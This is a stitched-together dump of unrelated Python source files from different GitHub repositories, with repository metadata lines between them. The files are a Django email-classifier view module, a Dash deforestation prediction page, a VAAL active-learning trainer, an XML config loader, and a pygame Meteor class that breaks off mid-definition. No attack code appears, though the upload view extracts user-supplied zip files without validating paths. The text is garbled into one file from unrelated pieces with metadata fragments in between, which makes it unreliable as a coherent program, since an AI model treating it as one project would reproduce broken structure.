    """Return (loss, gradients) of emb_loss w.r.t. the model's trainables."""
    with tf.GradientTape() as tape:
        loss_value = emb_loss(model, inputs, targets, training=True)
    gradients = tape.gradient(loss_value, model.trainable_variables)
    return loss_value, gradients
def traindl(request):
    """Train the hierarchical attention network (word encoder -> sentence
    encoder -> dense softmax) on the preprocessed train CSV using GloVe
    embeddings, then save the model to 'model_and_weights'."""
    try:
        df = pd.read_csv('Pre_Train.csv')
    except:
        return HttpResponse("<h1>FORBIDDEN!<h1><h2>You Need To First Upload The Train DataSet</h2>")
    else:
        # Shuffle the rows before batching.
        df = df.sample(frac=1)
        """**Applying the Categories to Numbers**"""
        df2 = pd.get_dummies(df['Category'])
        # Voabulary and number of words
        vocab = 10000
        sequence_length = 40
        df1 = df[['Lemma Body']]
        """**Converting to Numpy Array**"""
        # Prepare Tokenizer
        t = Tokenizer()
        words = list(df1['Lemma Body'])
        t.fit_on_texts(words)
        vocab_size = len(t.word_index) + 1
        # integer encode the documents
        encoded_docs = t.texts_to_sequences(words)
        # pad documents to a max length of 40 words
        padded_docs = pad_sequences(encoded_docs, maxlen=sequence_length, padding='post')
        # Preparing the labels into arrays
        labels = df2.to_numpy()
        """**Reshape to (Documents X Sentences X Words)**"""
        # NOTE(review): 297 documents is hard-coded — this breaks for any
        # other dataset size; derive from df.shape[0] instead (cf. testdl).
        a = tf.reshape(padded_docs, (297, 4, 10))
        x_train = a[:]
        y_train = labels[:]
        index_dloc = 'word_embeddings/glove_6B_300d.txt'
        """Here we create a dictionary named embedding vector, which will have keys, defined as words, present in the glove embedding file and the value of that key will be the embedding present in the file. This dictionary will contain all the words available in the glove embedding file."""
        embedding_index = dict()
        f = open(index_dloc)
        for line in tqdm(f):
            value = line.split(' ')
            word = value[0]
            coef = np.array(value[1:], dtype='float32')
            embedding_index[word] = coef
        f.close()
        # create a weight matrix for words in training docs
        embedding_matrix = np.zeros((vocab_size, 300))
        for word, i in t.word_index.items():
            embedding_vector = embedding_index.get(word)
            if embedding_vector is not None:
                embedding_matrix[i] = embedding_vector
        words = 10
        sentences = 4
        document = 16
        units = 64
        # Shape of Input = (No of document, No of Sentences, No of Words)
        # NOTE: `input` shadows the builtin here.
        input = Input(batch_input_shape=(document, sentences, words))
        # Word Encoder
        # Reshape into (No of Documents * No of Sentences, No of Words)
        # Embedding layer Output Shape = (No of Documents * No of Sentences, No of Words, Embedding Dimension)
        a1 = word_encoder(lstm_units=128, dense_units=64, emb=300, document=document, sentences=sentences, words=words,
                          embeddings=embedding_matrix)(input)
        a2 = AttentionWithContext()(a1)
        # Sentence Encoder
        a3 = sentence_encoder(lstm_units=128, dense_units=64, document=document, sentences=sentences, units=units)(a2)
        a4 = AttentionWithContext()(a3)
        a5 = Dropout(0.2)(a4)
        # Document Classification
        output = Dense(3, activation='softmax')(a5)
        model = Model(input, output)
        # print('Start Network Training')
        # Instantiate an optimizer
        adam = Adam(learning_rate=0.000099, beta_1=0.9, beta_2=0.999, amsgrad=False)
        # keep results for plotting
        train_loss_results = []
        for epoch in range(15):
            # NOTE(review): despite the name, this tracks categorical
            # *accuracy*, not loss.
            epoch_loss_avg = tf.keras.metrics.CategoricalAccuracy()
            # Training Loop, using the batches of 16
            for i in range(0, 13):
                x = x_train[i * 16:(i + 1) * 16]
                y = y_train[i * 16:(i + 1) * 16]
                # Optimize the model
                loss_value, grads = grad_emb(model, x, y)
                adam.apply_gradients(zip(grads, model.trainable_variables))
                # Track progress
                epoch_loss_avg.update_state(y, model(x))  # Add current batch loss
                # Compare predicted label to actual label
            # End epoch
            train_loss_results.append(epoch_loss_avg.result())
            # print("Epoch {:03d}: Loss: {:.3f}".format(epoch, epoch_loss_avg.result()))
        # print('Finish Network Training')
        model.save('model_and_weights')
        # NOTE(review): context key 'train_succes' is misspelled; the
        # template checks 'train_success' elsewhere — confirm.
        return render(request, 'home.html',{'train_succes':True})
############################################################# SUBMIT TEST DATASET FUNCTION ###################################
def submit_test(request):
    """Accept a POSTed zip of Outlook .msg test files, extract them,
    remember the file names for later labelling, build a
    (Subject, Body) CSV, preprocess it, and return the CSV inline.
    """
    if request.method == 'GET':
        return HttpResponse("<h1>FORBIDDEN!</h1> <h2>This Page Cannot Be Accessed Directly.</h2>")
    elif request.method == 'POST':
        # print("For debug")
        # print(request.FILES)
        file = request.FILES['test']
        if is_zipfile(file) is False:
            return HttpResponse("<h1>FORBIDDEN!<h1><h2>You Need To Upload A Zip File Containing The DataSet</h2>")
        # Stores the categories obtained
        cats = []
        # Extract the files to a new directory named by the input folder name
        file_path = ""
        with ZipFile(file,'r') as myzip:
            path = Path(myzip)
            # print(path.name)
            # each top-level folder inside the zip is walked below
            for dir in path.iterdir():
                cats.append(dir.name)
            file_path = os.getcwd() + os.path.sep + myzip.filename.split('.')[0]
            print(file_path)
            myzip.extractall(path=file_path)
        # Now the Zip file has been extracted to the working directory and file_path is the absolute path of the folder
        data = []
        file_list = []
        for cat in cats:
            sub_path = file_path + os.path.sep + cat
            for root,directories,files in os.walk(sub_path):
                for file in files:
                    abs_path = os.path.join(root,file)
                    # with extract_msg.Message(abs_path) as msg:
                    # NOTE(review): .msg opened in text mode — confirm
                    # outlook_msg accepts that on all OSes.
                    with open(abs_path) as msg_file:
                        msg = Message(msg_file)
                        # Quote subject/body so embedded commas survive the CSV.
                        sub = "\""+msg.subject+"\""
                        body = "\""+msg.body+"\""
                        temp = [sub, body]
                        data.append(temp)
                        file_list.append(file)
        # save the names of files for later use in classifying
        open_file = open(test_filelist_filename, 'wb')
        pickle.dump(file_list,open_file)
        open_file.close()
        # Create the dataframe
        df = pd.DataFrame(data,columns=['Subject', 'Body'])
        csv_path = file_path+'.csv'
        df.to_csv(csv_path, index=False, header=True)
        preprocess(csv_path=csv_path,test=True)
        with open(csv_path, 'rb') as fh:
            response = HttpResponse(fh.read(), content_type="text/csv")
            response['Content-Disposition'] = 'inline; filename=' + os.path.basename(csv_path)
            return response
    # NOTE(review): unreachable — both method branches above return first.
    return HttpResponse("DONE")
############################################################# ML TEST DATASET FUNCTION ###################################
def testml(request):
    """Vectorise the preprocessed test CSV with the saved TF-IDF model,
    predict categories with the saved RandomForest, and write/show the
    per-file predictions (Test_Output.csv)."""
    try:
        data = pd.read_csv("Pre_Test.csv", encoding='utf-8')
        data['Lemma Message'] = data['Lemma Subject'].astype(str) + " " + data['Lemma Body'].astype(str)
        df = data[['Lemma Message']]
        # retreve the tfidf model from disk
        open_file = open(tfidf_file,'rb')
        tfidf = pickle.load(open_file)
        open_file.close()
        # generate X_test
        X_test = tfidf.transform(df['Lemma Message']).toarray()
        model = pickle.load(open('Train_AI_Model', 'rb'))
        # y_pred_proba = model.predict_proba(X_test)
        y_pred = model.predict(X_test)
        # Now y_pred contains numbers in ranges 0..number of categories
        # retrieve the categories names
        open_file = open(category_filename, 'rb')
        cats = pickle.load(open_file)
        open_file.close()
        # Next retrieve the filenames from disk
        open_file = open(test_filelist_filename, 'rb')
        file_list = pickle.load(open_file)
        open_file.close()
        # pair each original file name with its predicted category label
        df_dat = []
        for idx, f in enumerate(file_list):
            temp = [f, cats[y_pred[idx]]]
            df_dat.append(temp)
        df = pd.DataFrame(df_dat, columns=['Filename', 'Category'])
        df.to_csv('Test_Output.csv', index=False, header=True)
        return render(request, 'home2.html', {'train_success': True ,'test_done': True, 'output': df_dat})
    except:
        # NOTE(review): this bare except hides *any* failure above
        # (missing model, bad columns, ...) behind this one message —
        # consider narrowing to FileNotFoundError.
        return HttpResponse("<h1>FORBIDDEN!</h1> <h2>First upload the Test Dataset.</h2>")
############################################################# DL TEST DATASET FUNCTION ###################################
model = None
def testdl(request):
    """Run the saved hierarchical-attention model over the preprocessed
    test CSV in fixed-size batches and write/show the per-file predictions."""
    try:
        df = pd.read_csv("Pre_Test.csv", encoding='utf-8')
    except:
        return HttpResponse("<h1>FORBIDDEN!<h1><h2>You Need To Upload A Zip File Containing The Test DataSet</h2>")
    else:
        df = df.sample(frac=1)
        # Vocabulary and number of words
        vocab = 10000
        sequence_length = 40
        word = 10
        sentences = int(sequence_length / word)
        document = 8 #####
        units = 64
        df1 = df[['Lemma Body']]
        # Prepare Tokenizer
        # NOTE(review): the tokenizer is re-fit on the *test* corpus, so word
        # indices will not match the training tokenizer — confirm intent.
        t = Tokenizer()
        wors = list(df1['Lemma Body'])
        t.fit_on_texts(wors) #
        vocab_size = len(t.word_index) + 1
        # integer encode the documents
        encoded_docs = t.texts_to_sequences(wors)
        # pad documents to a max length of 40 words
        padded_docs = pad_sequences(encoded_docs, maxlen=sequence_length, padding='post')
        """**Reshape to (Documents X Sentences X Words)**"""
        a = tf.reshape(padded_docs, (df.shape[0], int(sequence_length/10), 10))
        x_test = a[:]
        batch = document
        # Cache the loaded model in the module-level `model` across requests.
        global model
        # try:
        if model is None:
            # NOTE(review): traindl() saves to 'model_and_weights' but this
            # loads 'model_name' — confirm which path is correct.
            model = keras.models.load_model('model_name')
        # except:
        #    return HttpResponse("<h1>FORBIDDEN!<h1><h2>You Need To Train The Model First</h2>")
        # else:
        # seed row of zeros so vstack has something to stack onto; deleted below
        result = np.zeros((1, 3))
        # result = model.predict(a[:])
        for i in range(0, int(x_test.shape[0] / batch)):
            predictions = model.predict(x_test[batch * i:batch * (i + 1)])
            result = np.vstack((result, predictions))
        result = np.delete(result, (0), axis=0)
        # argmax over the three class columns -> predicted label per row
        b = pd.DataFrame(result, columns=['MDU', 'Retirements', 'Transfers'])
        b = pd.DataFrame(b.idxmax(axis=1), columns=['Predicted'])
        open_file = open(category_filename, 'rb')
        cats = pickle.load(open_file)
        open_file.close()
        # Next retrieve the filenames from disk
        open_file = open(test_filelist_filename, 'rb')
        file_list = pickle.load(open_file)
        open_file.close()
        df_dat = []
        for idx, f in enumerate(file_list):
            # rows past the last full batch were never predicted — skip them
            if idx >= int(b.shape[0]/batch)*batch:
                break
            temp = [f, b.iloc[idx][0]]
            df_dat.append(temp)
        df = pd.DataFrame(df_dat, columns=['Filename', 'Category'])
        df.to_csv('Test_Output.csv', index=False, header=True)
        return render(request, 'home.html', {'test_success': True, 'test_done': True, 'output': df_dat})
############################################################# DOWNLOAD TEST OUTPUT FUNCTION ##########################
def download(request):
    """Serve Test_Output.csv (the prediction results) as an inline CSV.

    Bug fix: the file handle was opened and never closed; now read inside
    a ``with`` block. The except is narrowed from a bare ``except:`` to
    OSError (covers the missing/unreadable-file case it was guarding).
    """
    try:
        with open('Test_Output.csv', 'rb') as fh:
            payload = fh.read()
    except OSError:
        return HttpResponse("<h1>FORBIDDEN!</h1> <h2>Train the model first.</h2>")
    response = HttpResponse(payload, content_type="text/csv")
    response['Content-Disposition'] = 'inline; filename=Test_Output.csv'
    return response
| TheThinker01/AiEmailClassifier | server/views.py | views.py | py | 24,603 | python | en | code | 1 | github-code | 36 | [
{
"api_name": "nltk.download",
"line_number": 13,
"usage_type": "call"
},
{
"api_name": "nltk.download",
"line_number": 16,
"usage_type": "call"
},
{
"api_name": "nltk.download",
"line_number": 19,
"usage_type": "call"
},
{
"api_name": "django.shortcuts.render",
... |
75216777705 | from joblib import load
pipeline1 = load('assets/xgb1.joblib')
pipeline2 = load('assets/xgb2.joblib')
# Imports from 3rd party libraries
import dash
import dash_bootstrap_components as dbc
import dash_core_components as dcc
import dash_html_components as html
from dash.dependencies import Input, Output
from xgboost import XGBRegressor
import pandas as pd
import numpy as np
import category_encoders as ce
import plotly.graph_objects as go
# Imports from this application
from app import app
## for chloropleth mapbox usage
mapboxt = open("./amazon/token.txt").read()
# style for controls
style = {'padding': '1.5em'}
# controls start here
layout = html.Div([
dcc.Markdown("""
### Predict
Use the controls below to update your predicted location, based on
area in km^2, day, month, year and state.
*(Predictions based on sample dataset using XGboost model. Check the [Process](https://amazon-deforestation.herokuapp.com/process) page why.)*
"""),
html.Div([
dcc.Markdown('###### Area in km^2'),
dcc.Slider(
id='area',
min=0.062,
max=1.440,
step=0.040,
value=0.090,
marks={n: f'{n:.2f}' for n in np.arange(0.006, 1.440, 0.040)}
),
], style=style),
html.Div([
dcc.Markdown('###### Day'),
dcc.Slider(
id='day',
min=1,
max=30,
step=1,
value=25,
marks={n: str(n) for n in range(1, 31, 1)}
),
], style=style),
html.Div([
dcc.Markdown('###### Month'),
dcc.Slider(
id='month',
min=1,
max=12,
step=1,
value=7,
marks={n: str(n) for n in range(1, 13, 1)}
),
], style=style),
html.Div([
dcc.Markdown('###### Year'),
dcc.Slider(
id='year',
min=2008,
max=2025,
step=1,
value=2017,
marks={n: str(n) for n in range(2008, 2025, 1)}
),
], style=style),
html.Div([
dcc.Markdown('###### State'),
dcc.Dropdown(
id='state',
options=[{'label': state, 'value': state} for state in ['Para', 'Mato Grosso', 'Rondonia', 'Amazonas','Maranhao', 'Acre', 'Roraima', 'Amapa', 'Tocantins']],
value='Para'
),
], style=style),
# Scatter mapbox plot with predictions
html.Div([
dcc.Graph(id='graph')
],
style=style)
])
# get the inputs
@app.callback(
    # Output(component_id='prediction-content', component_property='children'),
    Output(component_id='graph', component_property='figure'),
    [Input(component_id='area', component_property='value'),
     Input(component_id='day', component_property='value'),
     Input(component_id='month', component_property='value'),
     Input(component_id='year', component_property='value'),
     Input(component_id='state', component_property='value')])
# apply model
def predict(area, day, month, year, state):
    """Dash callback: predict the coordinates of a deforested area and
    return a scattermapbox figure centred on the Amazon basin.

    The two pickled pipelines each predict one coordinate; results[0] is
    used as latitude and results[1] as longitude below — presumably
    pipeline1 = latitude, pipeline2 = longitude (confirm against training).
    """
    # Single-row frame matching the training feature layout.
    df = pd.DataFrame(
        columns=['areakm_squared', 'day', 'month', 'year', 'states'],
        data=[[area, day, month, year, state]])
    y_pred_1 = pipeline1.predict(df)[0]
    y_pred_2 = pipeline2.predict(df)[0]
    # print(y_pred_1)
    # print(y_pred_2)
    results = [y_pred_1, y_pred_2]
    graphing = {
        'data': [{
            'type': 'scattermapbox',
            'lat': [results[0]],
            'lon': [results[1]],
            'name':'Predicted location of deforested area',
            'showlegend': True,
            'mode': 'markers',
            'hoverinfo': 'all',
            'text':f'predicted location latitude:{results[0]}, longitude:{results[1]}',
            'marker':go.scattermapbox.Marker(
                size=30,
                color='#E51313',
                opacity=0.8),
            'hovertemplate': f'Predicted location: latitude:{results[0]:.4f}, longitude:{results[1]:.4f} with {area} km^2'
        }],
        'layout': go.Layout(title_text= f'Predictions for state <b>{state}</b><br> latitude:<b>{results[0]:.4f}</b>, longitude:<b>{results[1]:.4f}</b> with <b>{area}</b> km^2',
                            title_x=0.05, width =1000, height=660,
                            mapbox = dict(center= dict(lat=-5.977402, lon=-58.97948),
                                          accesstoken= mapboxt,
                                          pitch=0,
                                          zoom=4,
                                          style='light'
                                          ),
                            mapbox_style = "streets",
                            showlegend=True,
                            legend=dict(x=0.7, y=1.15))
    }
    return go.Figure(data=graphing['data'], layout=graphing['layout'])
| tigju/Amazon-Deforestation-Prediction-App | pages/predictions.py | predictions.py | py | 4,861 | python | en | code | 1 | github-code | 36 | [
{
"api_name": "joblib.load",
"line_number": 2,
"usage_type": "call"
},
{
"api_name": "joblib.load",
"line_number": 3,
"usage_type": "call"
},
{
"api_name": "dash_html_components.Div",
"line_number": 26,
"usage_type": "call"
},
{
"api_name": "dash_core_components.M... |
31113872518 | """
The main script that serves as the entry-point for all kinds of training experiments.
"""
from __future__ import annotations
import logging
from functools import partial
from typing import TYPE_CHECKING, Any, Callable, Mapping, Optional, Sequence, Tuple, Union
import torch
from al.core.data.collators import JointBatchToTensorDataCollator
from al.core.models.vaal.xai_model import VAALXAIModel
from al.core.training.query_strategies.factory import QueryStrategyFactory
from al.core.training.trainer import DALTrainer
from ignite.contrib.handlers import TensorboardLogger
from torch import nn
from xai_torch.core.args import Arguments
from xai_torch.core.constants import DataKeys
from xai_torch.core.models.utilities.data_collators import BatchToTensorDataCollator
from xai_torch.core.models.xai_model import XAIModel
from xai_torch.core.training.utilities import reset_random_seeds
if TYPE_CHECKING:
from al.core.training.query_strategies.base import QueryStrategy
from xai_torch.core.args import Arguments
from xai_torch.core.data.data_modules.base import BaseDataModule
from al.core.data.active_learning_datamodule import ActiveLearningDataModule
from ignite.engine import Engine
from xai_torch.core.training.constants import TrainingStage
logging.basicConfig(level=logging.INFO)
class VAALTrainer(DALTrainer):
    """Active-learning trainer for VAAL (Variational Adversarial Active Learning).

    Extends DALTrainer with a three-part update per iteration — task model,
    VAE, and adversarial discriminator ("dsc") — and a round-based
    active-learning loop that re-trains, tests, and queries new labels.
    """

    @classmethod
    def configure_running_avg_logging(cls, args: Arguments, engine: Engine, stage: TrainingStage):
        """Attach running-average metrics for the task/vae/dsc losses to *engine*."""
        from ignite.metrics import RunningAverage

        def output_transform(x: Any, index: int, name: str) -> Any:
            # Extract one scalar from the engine output regardless of whether the
            # update function returned a mapping, a sequence, or a bare value.
            import numbers
            import torch
            if isinstance(x, Mapping):
                return x[name]
            elif isinstance(x, Sequence):
                return x[index]
            elif isinstance(x, (torch.Tensor, numbers.Number)):
                return x
            else:
                raise TypeError(
                    "Unhandled type of update_function's output. "
                    f"It should either mapping or sequence, but given {type(x)}"
                )

        # add loss as a running average metric
        for i, n in enumerate([f"{step}_{DataKeys.LOSS}" for step in ["task", "vae", "dsc"]]):
            RunningAverage(
                alpha=0.5, output_transform=partial(output_transform, index=i, name=n), epoch_bound=False
            ).attach(engine, f"{stage}/{n}")

    @classmethod
    def setup_training_engine(cls, args, model, train_dataloader, val_dataloader, output_dir, tb_logger, device):
        """Create, configure, and return the training engine (and optional validation engine)."""
        # setup training engine
        training_engine = cls.initialize_training_engine(
            args=args, model=model, train_dataloader=train_dataloader, device=device
        )
        validation_engine = None
        if args.general_args.do_val:
            # setup validation engine
            validation_engine = cls.initialize_validation_engine(args=args, model=model, device=device)
        # configure training and validation engines
        cls.configure_training_engine(
            args=args,
            training_engine=training_engine,
            model=model,
            output_dir=output_dir,
            tb_logger=tb_logger,
            train_dataloader=train_dataloader,
            validation_engine=validation_engine,
            val_dataloader=val_dataloader,
        )
        # add training hooks from the model
        model.add_training_hooks(training_engine)
        return training_engine, validation_engine

    @classmethod
    def initialize_training_engine(
        cls,
        args: Arguments,
        model: VAALXAIModel,
        train_dataloader: DataLoader,  # NOTE(review): DataLoader is not imported in this module — verify
        device: Optional[Union[str, torch.device]] = torch.device("cpu"),
        scaler: Optional["torch.cuda.amp.GradScaler"] = None,
    ) -> Callable:
        """Build the ignite Engine that performs one full VAAL update per iteration.

        Each iteration runs one task-model step, then ``num_vae_steps`` VAE steps
        and ``num_adv_steps`` discriminator steps, drawing fresh batches between
        the extra steps.
        """
        def cycle(iterable):
            # Endlessly re-iterate the dataloader so the extra vae/dsc steps can
            # draw fresh batches mid-iteration.
            while True:
                for i in iterable:
                    yield i

        if args.training_args.gradient_accumulation_steps <= 0:
            raise ValueError(
                "Gradient_accumulation_steps must be strictly positive. "
                "No gradient accumulation if the value set to one (default)."
            )
        from ignite.engine import Engine
        # get related arguments
        gradient_accumulation_steps = args.training_args.gradient_accumulation_steps
        non_blocking = args.training_args.non_blocking_tensor_conv
        train_datacycler = cycle(train_dataloader)

        def update_model(engine, model, batch, step="task"):
            # One forward/backward/optimizer step for the sub-model chosen by
            # `step` ("task", "vae" or "dsc"), honouring gradient accumulation.
            from xai_torch.core.constants import DataKeys
            # perform optimizers zero_grad() operation with gradient accumulation
            if (engine.state.iteration - 1) % gradient_accumulation_steps == 0:
                print(step, "zero grad")  # NOTE(review): leftover debug print
                model.optimizers[step].zero_grad()
            # forward pass
            model_output = model.torch_model.training_step(batch=batch, step=step)
            # make sure we get a dict from the model
            assert isinstance(model_output, dict), "Model must return an instance of dict."
            # get loss from the output dict
            loss = model_output[DataKeys.LOSS]
            # accumulate loss if required
            if gradient_accumulation_steps > 1:
                loss = loss / gradient_accumulation_steps
            # backward pass
            loss.backward()
            print(step, loss)  # NOTE(review): leftover debug print
            # perform optimizer update for correct gradient accumulation step
            if engine.state.iteration % gradient_accumulation_steps == 0:
                model.optimizers[step].step()
                print(step, "step update")  # NOTE(review): leftover debug print
            # if on the go training evaluation is required, detach data from the graph
            if args.training_args.eval_training and step == "task":
                return_dict = {}
                for key, value in model_output.items():
                    if key == DataKeys.LOSS:
                        return_dict[key] = value.item()
                    elif isinstance(value, torch.Tensor):
                        return_dict[key] = value.detach()
                return return_dict
            return {f"{step}_{DataKeys.LOSS}": model_output[DataKeys.LOSS].item()}

        def training_step(engine: Engine, _) -> Union[Any, Tuple[torch.Tensor]]:
            """
            Define the model training update step
            """
            from ignite.utils import convert_tensor
            # setup model for training
            model.torch_model.train()
            # get batch from dataloader
            batch = next(train_datacycler)
            # put batch to device
            batch = convert_tensor(batch, device=device, non_blocking=non_blocking)
            # call task model update
            task_output = update_model(engine, model, batch, step="task")
            # call the vae update
            for count in range(args.al_args.training_args.num_vae_steps):
                vae_output = update_model(engine, model, batch, step="vae")
                # sample new batch if needed to train the adversarial network
                if count < (args.al_args.training_args.num_vae_steps - 1):
                    batch = next(train_datacycler)
                    batch = convert_tensor(batch, device=device, non_blocking=non_blocking)
            # call the dsc update
            for count in range(args.al_args.training_args.num_adv_steps):
                dsc_output = update_model(engine, model, batch, step="dsc")
                # sample new batch if needed to train the adversarial network
                if count < (args.al_args.training_args.num_adv_steps - 1):
                    batch = next(train_datacycler)
                    batch = convert_tensor(batch, device=device, non_blocking=non_blocking)
            # NOTE(review): vae_output / dsc_output are unbound (NameError) if
            # num_vae_steps or num_adv_steps is 0 — confirm both are always >= 1.
            return {**task_output, **vae_output, **dsc_output}
        return Engine(training_step)

    @classmethod
    def setup_model(
        cls,
        args: Arguments,
        datamodule: BaseDataModule,
        tb_logger: TensorboardLogger,
        summarize: bool = False,
        stage: TrainingStage = TrainingStage.train,
    ) -> XAIModel:
        """
        Initializes the model for training.
        """
        from xai_torch.core.models.factory import ModelFactory
        # setup model; wrap it in the VAAL-specific model wrapper
        model = ModelFactory.create(args, datamodule, tb_logger=tb_logger, wrapper_class=VAALXAIModel)
        model.setup(stage=stage)
        # generate model summary
        if summarize:
            model.summarize()
        return model

    @classmethod
    def train(cls, local_rank, args: Arguments):
        """
        Initializes the training of a model given dataset, and their configurations.

        Runs the full active-learning loop: for each round, (re-)train the model
        on the current labeled pool, test it, query new samples to label, and
        persist the round state so training can resume.
        """
        import ignite.distributed as idist
        from xai_torch.core.training.utilities import initialize_training, setup_logging
        from xai_torch.utilities.logging_utils import DEFAULT_LOGGER_NAME, setup_logger
        # setup logging
        logger = setup_logger(DEFAULT_LOGGER_NAME, distributed_rank=local_rank, level=logging.INFO)
        # initialize training
        initialize_training(args)
        # initialize torch device (cpu or gpu)
        device = idist.device()
        # get device rank
        rank = idist.get_rank()
        # initialize logging directory and tensorboard logger
        output_dir, tb_logger = setup_logging(args)
        # setup datamodule
        datamodule: ActiveLearningDataModule = cls.setup_datamodule(args, rank=rank, stage=None)
        # setup model
        model = cls.setup_model(args, datamodule, tb_logger, summarize=True)
        # define active learning query strategy
        query_strategy: QueryStrategy = QueryStrategyFactory.create(
            datamodule=datamodule, model=model, device=device, args=args.al_args
        )
        # load active learning state (resumes from a previous run if one exists)
        al_state = DALTrainer.load_round_state(0, datamodule, output_dir=output_dir)
        curr_round = al_state["curr_round"]
        if curr_round == args.al_args.n_rounds:
            logger.warning(
                "Active learning rounds have already been finished! Either increase the number of "
                f"max rounds (current={args.al_args.n_rounds}) "
                "OR reset the training from start."
            )
            exit()
        # reset seeds for training. This allows multiple experiments with same seed for dataset initialization but
        # different seeds for the active learning training process.
        reset_random_seeds(args.al_args.al_seed)
        while curr_round < args.al_args.n_rounds:
            from al.core.training.query_strategies.impl.ceal import CEAL
            logger.info(f"============== Running round={curr_round} of active learning ===========")
            # update tblogger dir — only rank 0 writes tensorboard logs
            tb_logger = None
            if rank == 0:
                from ignite.contrib.handlers import TensorboardLogger
                tb_logger = TensorboardLogger(output_dir / str(curr_round))
            # print labels summary
            datamodule.print_label_summary()
            # Reset model for re-training
            if args.al_args.reset_model:
                model = cls.setup_model(args, datamodule, tb_logger, summarize=False)
            else:
                # Reset only optimizers and schedulers
                model._opt_sch_handler.setup_opt_sch()
            # get train dataloader for labelled data
            joint_dataloader = datamodule.get_joint_dataset_loader(
                collate_fn=JointBatchToTensorDataCollator(datamodule._collate_fns.train)
            )
            # get validation data loader
            val_dataloader = datamodule.val_dataloader()
            # setup training engine
            training_engine, _ = cls.setup_training_engine(
                args=args,
                model=model,
                train_dataloader=joint_dataloader,
                val_dataloader=val_dataloader,
                output_dir=output_dir / str(curr_round),  # append round number to output_dir
                tb_logger=tb_logger,
                device=device,
            )
            training_engine.logger = logger
            resume_epoch = training_engine.state.epoch
            if not (training_engine._is_done(training_engine.state) or resume_epoch >= args.training_args.max_epochs):
                # run training
                training_engine.run(range(len(joint_dataloader)), max_epochs=args.training_args.max_epochs)
                # training_engine.run(labeled_dataloader, max_epochs=args.training_args.max_epochs)
                # after the training, the test engine automatically loads the 'best' model to continue the rounds.
                test_dataloader = datamodule.test_dataloader()
                # run testing after the end of every round
                test_engine = cls.setup_test_engine(
                    args=args,
                    model=model,
                    test_dataloader=test_dataloader,
                    output_dir=output_dir / str(curr_round),
                    tb_logger=tb_logger,
                    device=device,
                )
                test_engine.logger = logger
                test_engine.run(test_dataloader)
            else:
                # if we are resuming from last checkpoint and training is already finished
                logger.info(
                    "Training has already been finished! Either increase the number of "
                    f"epochs (current={args.training_args.max_epochs}) >= {resume_epoch} "
                    "OR reset the training from start."
                )
                # after the training, the test engine automatically loads the 'best' model to continue the rounds.
                test_dataloader = datamodule.test_dataloader()
                # don't run test but just set it up so that model has latest correct checkpoint loaded
                test_engine = cls.setup_test_engine(
                    args=args,
                    model=model,
                    test_dataloader=test_dataloader,
                    output_dir=output_dir / str(curr_round),
                    tb_logger=tb_logger,
                    device=device,
                )
            # NOTE: The test engine has already updated the model state with state of last/best
            # checkpoint which will be used for querying of the next round.
            def perform_query():
                # Select the next batch of samples to label via the query strategy
                # and record how long the query took.
                import timeit
                # reset the querying strategy
                query_strategy.reset(model)
                # update the labeled pool
                start = timeit.default_timer()
                n_query_samples = int(args.al_args.n_query_ratio * datamodule.pool_size)
                if isinstance(query_strategy, CEAL):
                    # CEAL additionally needs the round index for its threshold decay
                    query_indices = query_strategy.query(n_samples=n_query_samples, round=curr_round)
                else:
                    query_indices = query_strategy.query(n_samples=n_query_samples)
                stop = timeit.default_timer()
                # NOTE(review): tb_logger is None when rank != 0 — this line would
                # raise AttributeError on non-zero ranks; verify single-process use.
                tb_logger.writer.add_scalar("query_time", stop - start, curr_round)
                datamodule.update_dataset_labels(query_indices)
            # perform query
            perform_query()
            # save active learning query state for next round
            DALTrainer.save_round_state(curr_round + 1, datamodule, output_dir=output_dir)
            if rank == 0:
                # close tb logger
                tb_logger.close()
            curr_round += 1
| saifullah3396/doc_al | src/al/core/training/vaal_trainer.py | vaal_trainer.py | py | 15,573 | python | en | code | 0 | github-code | 36 | [
{
"api_name": "typing.TYPE_CHECKING",
"line_number": 25,
"usage_type": "name"
},
{
"api_name": "logging.basicConfig",
"line_number": 34,
"usage_type": "call"
},
{
"api_name": "logging.INFO",
"line_number": 34,
"usage_type": "attribute"
},
{
"api_name": "al.core.tr... |
35396368561 | #!/usr/bin/env python3
# coding=utf-8
import xml.dom.minidom as xmldom
import os
class Appconfig(object):
    """Configuration of a single application entry parsed from the XML file.

    The attributes mirror the XML attributes of an ``<AppConfig>`` element.
    (The original class-level string defaults were removed: they were
    immediately shadowed by the instance attributes set in ``__init__``.)
    """

    def __init__(self, appCode, icon, version, pathType, path, arguments, appStartupType):
        self.AppCode = appCode                  # application identifier
        self.Icon = icon                        # icon path or name
        self.Version = version                  # application version string
        self.PathType = pathType                # how Path should be interpreted
        self.Path = path                        # executable path
        self.Arguments = arguments              # command-line arguments
        self.AppStartupType = appStartupType    # startup behaviour
class AppConfigure(object):
    """Loads :class:`Appconfig` entries from an XML configuration file."""

    def __init__(self):
        super().__init__()
        # Bug fix: the original kept `Appconfigs` as a class-level list, so every
        # instance shared (and cleared) the same data. Use an instance attribute.
        self.Appconfigs = []

    def loadConf(self, filepath):
        """Parse *filepath* and repopulate ``self.Appconfigs`` from its entries.

        Leaves the list empty when the file does not exist. Elements without an
        ``AppCode`` attribute are skipped.
        """
        self.Appconfigs.clear()
        if not os.path.isfile(filepath):
            return
        domTree = xmldom.parse(filepath)
        rootNode = domTree.documentElement
        for app in rootNode.getElementsByTagName("AppConfig"):
            if not app.hasAttribute("AppCode"):
                continue
            self.Appconfigs.append(Appconfig(
                app.getAttribute("AppCode"),
                app.getAttribute("Icon"),
                app.getAttribute("Version"),
                app.getAttribute("PathType"),
                app.getAttribute("Path"),
                app.getAttribute("Arguments"),
                app.getAttribute("AppStartupType"),
            ))
| LeeZhang1979/UniTools | conf/AppConfigure.py | AppConfigure.py | py | 1,538 | python | en | code | 0 | github-code | 36 | [
{
"api_name": "os.path.isfile",
"line_number": 36,
"usage_type": "call"
},
{
"api_name": "os.path",
"line_number": 36,
"usage_type": "attribute"
},
{
"api_name": "xml.dom.minidom.parse",
"line_number": 38,
"usage_type": "call"
},
{
"api_name": "xml.dom.minidom",
... |
2343066126 | import pygame
import Config
import random
import math
import entities
from entity import Entity
class Meteor(Entity):
    """A falling meteor that damages non-meteor entities it hits and bounces
    off other meteors."""

    def __init__(self, img):
        # Spawn at a random x along the top edge of the screen.
        self.x = random.randint(0, Config.WIDTH)
        self.y = 0
        self.size = random.randint(20, 65)
        self.speed = random.randint(3, 5)
        # Damage dealt on impact scales with both size and speed.
        self.damage = self.size * self.speed / 10
        self.mass = self.size ** 2
        self.kineticStrong = self.mass * self.speed
        self.startPosition = (self.x, self.y)
